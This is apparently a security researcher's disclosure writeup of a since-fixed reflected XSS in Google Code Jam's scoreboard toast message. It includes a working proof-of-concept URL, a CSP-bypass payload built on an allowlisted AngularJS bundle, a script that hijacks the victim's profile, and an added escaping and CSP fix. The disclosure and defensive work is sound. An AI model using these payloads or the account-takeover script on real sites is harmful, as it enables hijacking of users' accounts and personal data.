POC:

https://codejam.withgoogle.com/2018/challenges/0000000000007766/scoreboard/for/%3Cimg%20src=x%20onerror=alert(document.domain)%3E

Information about this XSS:

The XSS will be fired in the toast message.

Also, it seems like you have to open the homepage (https://codejam.withgoogle.com/2018/challenges/) at least once before visiting other pages there.
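The root cause is that the last path segment of the scoreboard URL is reflected into the toast message as markup rather than as text. The following is an added illustration of the fix, not code from the writeup or from Code Jam: an HTML-escaping helper and a toast renderer in both the vulnerable (string concatenation into HTML) and hardened form. The toast template, the function names and the sample input derived from the PoC URL are all assumptions constructed for this example.

```javascript
// Added example (not from the original writeup or from Code Jam).
// Escape the five characters that matter in an HTML text/attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern (assumed): the decoded path segment is concatenated
// straight into the toast's HTML, which is what an innerHTML-based toast does.
function renderToastUnsafe(name) {
  return '<div class="toast">Scoreboard for ' + name + '</div>';
}

// Hardened pattern: escape before concatenating. In a real browser the
// equivalent is toastElement.textContent = name, which needs no escaping.
function renderToastSafe(name) {
  return '<div class="toast">Scoreboard for ' + escapeHtml(name) + '</div>';
}

// Constructed sample input: the decoded last path segment of the PoC URL above.
const reflected = decodeURIComponent('%3Cimg%20src=x%20onerror=alert(document.domain)%3E');

// Constructed sample: the decoded last path segment of the PoC URL above.
console.log('unsafe: ' + renderToastUnsafe(reflected));
console.log('safe:   ' + renderToastSafe(reflected));
```

The escaped output still shows the attacker-controlled text verbatim in the toast (useful for debugging the reflection), but the parser sees `&lt;img ...&gt;` rather than an element, so no event handler attribute is ever created.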

CSP:

Due to CSP, this XSS fires only in browsers that don't enforce CSP (e.g. IE).

If we could somehow find a way to execute a script that has been inserted dynamically, we could bypass the CSP (thanks to gstatic.com being allowlisted) using the following payload. But I don't think it's possible in this case.

<script src="https://www.gstatic.com/fsn/angular_js-bundle1.js"></script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>
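For context on why the allowlisted gstatic.com host matters, here is an added, illustrative pair of policies (not the site's actual headers; the nonce value and host list are assumptions). The first is an allowlist-style policy where any listed host that also serves a CSP-compatible JS framework (like the AngularJS bundle above) becomes a script gadget once markup injection exists; the second is the nonce-based form that does not depend on which hosts are trusted.

```http
# Allowlist-based policy (assumed example): injected markup can point at any
# listed host, so a framework hosted there can be used as a gadget.
Content-Security-Policy: script-src 'self' https://www.gstatic.com; object-src 'none'

# Nonce-based policy (assumed example): only <script> elements carrying the
# per-response nonce execute, 'strict-dynamic' ignores the host allowlist
# entirely, and an injected parser-inserted <script src=...> has no nonce.
Content-Security-Policy: script-src 'nonce-r4nd0mN0nc3' 'strict-dynamic'; object-src 'none'; base-uri 'none'
```

With the nonce-based form, the `ng-csp` trick above never gets off the ground because the injected `<script src="https://www.gstatic.com/...">` tag is not nonced and so AngularJS is never loaded.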

Read more about bypassing CSP in my other post.

Attack scenario:

An attacker could gain access to the victim's CodeJam account, for example read and edit their profile information (address, phone number, etc.).

Here’s an example of how it could be done:

// go to profile page
document.querySelector('[href="/2018/profile"]').click();

setTimeout(function () {
  // change the username
  document.querySelector('#nickname').value = 'mynickname111';
  // create a fake input event so the framework notices the changed value
  var event = document.createEvent("Event");
  event.initEvent('input', false, true);
  document.querySelector('#nickname').dispatchEvent(event);
  // submit the form
  document.querySelector('[type="submit"]').click();
}, 1000);

 

Timeline:

29.08.2018: XSS reported
30.08.2018: Accepted
05.09.2018: Fixed

 

ThomasOrlita.cz
Follow me on Twitter: @ThomasOrlita
